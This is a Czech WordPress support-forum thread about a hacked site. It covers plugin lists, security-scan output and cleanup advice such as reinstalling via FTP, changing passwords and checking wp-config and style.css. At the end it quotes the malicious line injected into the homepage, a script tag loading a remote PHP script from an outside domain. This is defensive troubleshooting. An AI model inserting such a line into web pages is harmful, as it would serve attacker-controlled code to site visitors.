Re admin
ad 1) ve style.css jsem nenašel nic podezřelého kromě standardních stylů
stránky hostujeme na cesky-hosting.cz
Seznam pluginů:
- Another Wordpress Classifieds Plugin (AWPCP)
- BackWPup
- Countdown Widget
- Exploit Scanner
- Google Analytics for WordPress
- The Events Calendar
- TimThumb Vulnerability Scanner
- WP-Polls
- WP Security Scan

Šablona, která spolehlivě dá vir na stránky:
Wedding Bells Autor: Lauri Liimatta
http://wordpress.org/extend/themes/wedding-bells?TB_iframe=true&width=1024&height=800

Obávám se, že nejlepší bude opravdu smazat vše přes FTP a nahrát znovu.
Jelikož jsem WP začátečník, tak z toho mám trošku vítr, protože nevím co všechno je uloženo v souborech a co v databázích. A taky jak napojit čistou souborovou instalaci na existující DB. Zkusím zabrouzdat po netu.

Pokud bych měl vytvořit vir pro WP nemusím mít extra znalosti na to, aby mi došlo že šablona a pluginy budou první které uživatel zkontroluje. Proto bych samotný vir nakopíroval i do některých systémových souborů a do pluginů které by jste nepodezřívali a které má většina uživatelů stále aktivní (třeba akismet a další)...

Proto je nejjistější způsob jak se zbavit viru (nebo backdooru) ve WP kompletní smazání celého systému přes FTP a důsledná kontrola všech nově nahraných pluginů a šablon. Samotná aktualizace a přeinstalování systému z administrace vám nepomůže - nepřepíšou se všechny systémové soubory. Nemluvě o tom, že pak nemáte jistotu jestli se vám na FTP stahuje opravdu oficiální neinfikovaný WordPress ;)

Změna hesel je opravdu až tou poslední záležitostí...

1) Vir způsobil načítání zmíněného JavaScriptu, které je závislé na použité šabloně. Proto bude problém v této šabloně. Našel jsem ještě jednu zmínku o tomto viru v německém fóru (objevila se nedávno), kde upozorňují, že by zmíněný řádek měl být vložen na prvním řádku souboru style.css v adresáři používané šablony. Zkuste se tam podívat a odstranit ho.

2) Jak se to na web vůbec dostalo? Možností je několik:

a) Může za to uživatel - má zavirovaný počítač a ukládá si nešifrovaná hesla k FTP přímo do programu, který používá. Vir samozřejmě prozkoumá všechny FTP managery na FTP a případně nalezená hesla posílá autorům viru pro další použití. Zkuste pro jistotu prohlédnout počítač nějakým antivirem.

b) Může za to WordPress - velmi nepravděpodobné (ale také možné).

c) Může za to hosting - občas se to stává. Většinou by se ale objevilo více stížností, těžko říci. Jaký používáte hosting?

d) Může za to nějaký plugin, šablona nebo vlastní úprava - velmi časté. Jaké používáte pluginy? Zkuste nám sem dát seznam, třeba tam bude něco podezřelého, zejména Lukenzi v tom má dost přehled :-) I na německém fóru (viz odkaz výše) to řeší, uživatel s napadeným webem tam zveřejnil používané pluginy, třeba tam bude nějaký stejný, který by to mohl způsobovat?

Nepochopil jsem moc, jakou šablonu vlastně používáte? Píšete o Wedding Bells, kde vyšla nedávno nová verze. Rozhodně doporučujeme aktualizovat, pro příště bych pak prováděl úpravy např. pomocí pluginu či odvozené šablony, aby byly (samozřejmě v rámci možností) nezávislé na budoucích aktualizacích. Pak ale píšete ještě o šabloně Green, takže nevím, kterou vlastně používáte?

Zkusil jsem upgradovat všechny pluginy a upgradovat na čerstvou verzi Green - nepomohlo.

Plugin WP Security Scan je sice dobrý na zjištění (a upozornění) "potenciálních" bezpečnostních problémů, ale s virem už nic nezmůže. Stejně tak nezjistí žádný bezpečnostní problém v používaných pluginech a šablonách. Timthumb Vulnerability Scanner zase zkoumá pouze jeden z mnoha veřejně známých bezpečnostních problémů a patrně v tomto případě také moc nepomůže.

Všechna hesla je sice rozhodně dobré změnit, ale až po odstranění následku (viru) a příčiny (jak se tam dostal). Jinak je to podle mě vcelku zbytečné...

ad 1, WP security scan ohlásil následující:
You have the latest version of Wordpress.
Your table prefix should not be wp_. Click here to change it. Read more on why should change the prefix here.
Your WordPress version is successfully hidden.
WordPress DB Errors turned off.
WP ID META tag removed form WordPress core
"admin" user exists.
The file .htaccess does not exist in the wp-admin section. Read more why you should have a .htaccess file in the WP-admin area here.

zatím jsem nic neměnil, ale udělám, co píše že bych měl

ad 2) nic nenašel
No instances of timthumb were found on your server.

ad 3) změnil jsem heslo ftp, wp adminu
.htaccess chybí - viz hlášení z WP security scan - mrknu do instalačního balíčku WP
wp-config nemá podle mě nic špatnýho - ani vpravo nebo dole "za rohem"

Dnes mně přišlo, že ta moje šablona má novou verzi. Jen se musím podívat, jestli moje úpravy šablony to přežijou.

Díky
Pavel.

rád bych vyzkoušel jeden plugin, jestli timthumb vulnerability scan něco najde v tvé šabloně.

1) Zjisti kde je problém
nahraj si plugin WP Security Scan a aktivuj automatický scan stránek (websitedefender). Počkej chvíli na první scan a hod sem info jestli to něco našlo.

2)Instaluj timthumb vulnerability scan a spust scan. Ten zjistí jakou máš verzi timthump v šabloně (možná kontroluje i jiné externí files). Dej vědět jestli to něco najde a pomocí tohoto pluginu aktualizuj pokud ti to něco najde.

Asi by to chtělo reinstalovat šablonu, změnit všechny hesla (ftp, db, wp admin), htaccess a wp-config nastavit práva na 444. I tímto nezjistíme jestli daný soubor malware zmizel. Zkoukni wp-config jestli tam není nějaký divný kod navíc, často úplně dole a úplně vpravo.

Bigdrobek

Homepage má upravený zdrojový kód - je přidaný první řádek:

---------------------------------
<script type="text/javascript" src="http://asjo.com.br/js/Check.php"></script>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="cs-CZ">
...
---------------------------------